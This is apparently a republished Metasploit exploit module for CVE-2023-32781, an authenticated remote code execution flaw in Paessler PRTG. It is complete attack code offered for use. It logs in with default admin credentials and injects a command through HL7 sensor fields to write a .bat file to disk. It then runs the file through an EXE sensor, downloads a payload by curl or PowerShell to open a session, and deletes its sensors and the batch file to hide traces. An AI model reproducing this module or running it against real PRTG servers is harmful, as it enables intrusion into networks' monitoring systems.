PRTG Authenticated Remote Code Execution

`class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
include Msf::Exploit::Retry  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'PRTG CVE-2023-32781 Authenticated RCE',  
'Description' => %q{  
Authenticated RCE in Paessler PRTG  
},  
'License' => MSF_LICENSE,  
'Author' => ['Kevin Joensen <kevin[at]baldur.dk>'],  
'References' => [  
[ 'URL', 'https://baldur.dk/blog/prtg-rce.html'],  
[ 'CVE', '2023-32781']  
],  
'DisclosureDate' => '2023-08-09',  
'Platform' => 'win',  
'Arch' => [ ARCH_X86, ARCH_X64 ],  
'Targets' => [  
[  
'Windows_Fetch',  
{  
'Arch' => [ ARCH_CMD ],  
'Platform' => 'win',  
'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },  
'Type' => :win_fetch  
}  
],  
[  
'Windows_CMDStager',  
{  
'Arch' => [ ARCH_X64, ARCH_X86 ],  
'Platform' => 'win',  
'Type' => :win_cmdstager,  
'CmdStagerFlavor' => [ 'psh_invokewebrequest' ]  
}  
]  
],  
'DefaultTarget' => 0,  
  
'DefaultOptions' => {},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]  
}  
)  
)  
  
register_options(  
[  
OptString.new(  
'USERNAME',  
[ true, 'The username to authenticate with', 'prtgadmin' ]  
),  
OptString.new(  
'PASSWORD',  
[ true, 'The password to authenticate with', 'prtgadmin' ]  
),  
OptString.new(  
'TARGETURI',  
[ true, 'The URI for the PRTG web interface', '/' ]  
)  
]  
)  
end  
  
def check  
begin  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(datastore['URI'], '/index.htm')  
})  
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError  
return CheckCode::Unknown  
ensure  
disconnect  
end  
  
if res && res.code == 200  
prtg_server_header = res.headers['Server']  
  
if (prtg_server_header.include? 'PRTG') || (html.to_s.include? 'PRTG')  
return CheckCode::Detected  
end  
end  
  
return CheckCode::Unknown  
end  
  
def exploit  
@sensors_to_delete = []  
  
connect  
case target['Type']  
when :win_cmdstager  
execute_cmdstager  
when :win_fetch  
execute_command(payload.encoded)  
end  
end  
  
def on_new_session(client)  
super  
@sensors_to_delete.each do |sensor_id|  
delete_sensor_by_id(sensor_id)  
end  
print_good('Session created')  
end  
  
def execute_command(cmd, _opts = {})  
print_status('Running PRTG RCE exploit')  
authenticate_prtg  
bat_file_name = write_bat_file_to_disk(cmd)  
run_bat_file_from_disk(bat_file_name)  
print_status('Exploit done')  
handler  
end  
  
def authenticate_prtg  
print_status('Authenticating against PRTG')  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'public', 'checklogin.htm'),  
'keep_cookies' => true,  
'vars_post' => {  
'username' => datastore['USERNAME'],  
'password' => datastore['PASSWORD']  
}  
})  
unless res  
fail_with(Failure::NoAccess, 'Failure to connect to PRTG')  
end  
if res && res.code == 302 && res.get_cookies  
print_good('Successfully authenticated against PRTG')  
else  
fail_with(Failure::NoAccess, 'Failure to authenticate against PRTG')  
end  
end  
  
def get_csrf_token  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'welcome.htm'),  
'keep_cookies' => true  
})  
  
if res.nil? || res.body.nil?  
fail_with(Failure::NoAccess, 'Page with CSRF token not available')  
end  
  
regex = /csrf-token" content="([^"]+)"/  
token = res.body[regex, 1]  
  
print_status("Extracted csrf token: #{token}")  
token  
end  
  
def delete_sensor_by_id(sensor_id)  
print_status("Deleting sensor #{sensor_id}")  
csrf_token = get_csrf_token  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'api', 'deleteobject.htm'),  
'keep_cookies' => true,  
'headers' => {  
'anti-csrf-token' => csrf_token,  
'X-Requested-With' => 'XMLHttpRequest'  
},  
'vars_post' => {  
id: sensor_id,  
approve: 1  
}  
})  
  
if res.nil? || res.body.nil?  
fail_with(Failure::NoAccess, 'Sensor deletion failed')  
end  
end  
  
def get_created_sensor_id(sensor_name)  
print_status('Fetching created sensor id')  
  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'controls', 'deviceoverview.htm'),  
'keep_cookies' => true,  
'vars_get' => {  
'id' => 40  
}  
})  
  
if res.nil? || res.body.nil?  
fail_with(Failure::NoAccess, 'Page with sensorid not available')  
end  
  
regex = /id=([0-9]+)">#{sensor_name}/  
sensor_id = res.body[regex, 1]  
  
print_status("Extracted sensor_id: #{sensor_id}")  
sensor_id  
end  
  
def run_sensor_with_id(sensor_id)  
csrf_token = get_csrf_token  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'api', 'scannow.htm'),  
'keep_cookies' => true,  
'headers' => {  
'anti-csrf-token' => csrf_token,  
'X-Requested-With' => 'XMLHttpRequest'  
},  
'vars_post' => {  
id: sensor_id  
}  
})  
  
if res && res.code == 200  
print_good('Sensor started running')  
else  
fail_with(Failure::NoAccess, 'Failure to run sensor')  
end  
end  
  
def write_bat_file_to_disk(cmd)  
# Uses the HL7Sensor for writing a .bat file to the disk  
cmd = cmd.gsub! '\\', '\\\\\\'  
print_status('Writing .bat to disk')  
  
csrf_token = get_csrf_token  
  
# Generate a random sensor name  
sensor_name = Rex::Text.rand_text_alphanumeric(8..10)  
bat_file_name = "#{Rex::Text.rand_text_alphanumeric(8..10)}.bat"  
  
# Clean up the .bat file  
cmd = "#{cmd} & del %0"  
  
print_status("Generated sensor_name #{sensor_name}")  
print_status("Generated bat_file_name #{bat_file_name}")  
  
params = {  
'name_' => sensor_name,  
'parenttags_' => '',  
'tags_' => 'dicom hl7',  
'priority_' => '3',  
'port_' => '104',  
'timeout_' => '60',  
'override_' => '0',  
'sendapp_' => Rex::Text.rand_text_alphanumeric(4..5),  
'sendfac_' => Rex::Text.rand_text_alphanumeric(4..5),  
'recvapp_' => Rex::Text.rand_text_alphanumeric(4..5),  
'recvfac_' => "#{Rex::Text.rand_text_alphanumeric(4..5)}\" -debug=\"..\\Custom Sensors\\EXE\\#{bat_file_name}\" -recvapp=\"#{Rex::Text.rand_text_alphanumeric(4..5)}",  
'hl7file_' => "ADT_& #{cmd} & A08.hl7|ADT_A08.hl7||",  
'hl7filename' => '',  
'intervalgroup' => ['0', '1'],  
'interval_' => '60|60 seconds',  
'errorintervalsdown_' => '1',  
'inherittriggers' => '1',  
'id' => '40',  
'sensortype' => 'hl7',  
'tmpid' => '2',  
'anti-csrf-token' => csrf_token  
}  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'addsensor5.htm'),  
'keep_cookies' => true,  
'vars_post' => params  
})  
  
unless res  
fail_with(Failure::NoAccess, 'Failure to connect to PRTG')  
end  
  
if res && res.code == 302  
print_good('HL7 Sensor succesfully created')  
else  
fail_with(Failure::NoAccess, 'Failure to create HL7 sensor')  
end  
# Actually creating the sensor can take 1-2 seconds  
print_status('Checking for sensor creation')  
sensor_id = retry_until_truthy(timeout: 10) do  
get_created_sensor_id(sensor_name)  
end  
  
print_status('Requesting HL7 Sensor to initiate scan')  
  
run_sensor_with_id(sensor_id)  
@sensors_to_delete.push(sensor_id)  
  
print_good('.bat file written to disk')  
bat_file_name  
end  
  
def run_bat_file_from_disk(bat_file_name)  
print_status("Running the .bat file: #{bat_file_name}")  
csrf_token = get_csrf_token  
sensor_name = Rex::Text.rand_text_alphanumeric(8..10)  
  
params = {  
'name_' => sensor_name,  
'parenttags_' => '',  
'tags_' => 'exesensor',  
'priority_' => '3',  
'scriptplaceholdergroup' => '1',  
'scriptplaceholder1description_' => '',  
'scriptplaceholder1_' => '',  
'scriptplaceholder2description_' => '',  
'scriptplaceholder2_' => '',  
'scriptplaceholder3description_' => '',  
'scriptplaceholder3_' => '',  
'scriptplaceholder4description_' => '',  
'scriptplaceholder4_' => '',  
'scriptplaceholder5description_' => '',  
'scriptplaceholder5_' => '',  
'exefile_' => "#{bat_file_name}|#{bat_file_name}||",  
'exefilelabel' => '',  
'exeparams_' => '',  
'environment_' => '0',  
'usewindowsauthentication_' => '0',  
'mutexname_' => '',  
'timeout_' => '60',  
'valuetype_' => '0',  
'channel_' => 'Value',  
'unit_' => '#',  
'monitorchange_' => '0',  
'writeresult_' => '0',  
'intervalgroup' => '0',  
'interval_' => '43200|12 hours',  
'errorintervalsdown_' => '1',  
'inherittriggers' => '1',  
'id' => '40',  
'sensortype' => 'exe',  
'tmpid' => '6',  
'anti-csrf-token' => csrf_token  
}  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'addsensor5.htm'),  
'keep_cookies' => true,  
'vars_post' => params  
})  
  
unless res  
fail_with(Failure::NoAccess, 'Failure to connect to PRTG')  
end  
  
if res && res.code == 302  
print_status('EXE Script sensor created')  
else  
fail_with(Failure::NoAccess, 'Failure to create EXE Script sensor')  
end  
  
print_status('Checking for sensor creation')  
  
sensor_id = retry_until_truthy(timeout: 10) do  
get_created_sensor_id(sensor_name)  
end  
run_sensor_with_id(sensor_id)  
@sensors_to_delete.push(sensor_id)  
print_good('Exploit completed. Waiting for payload')  
end  
end  
`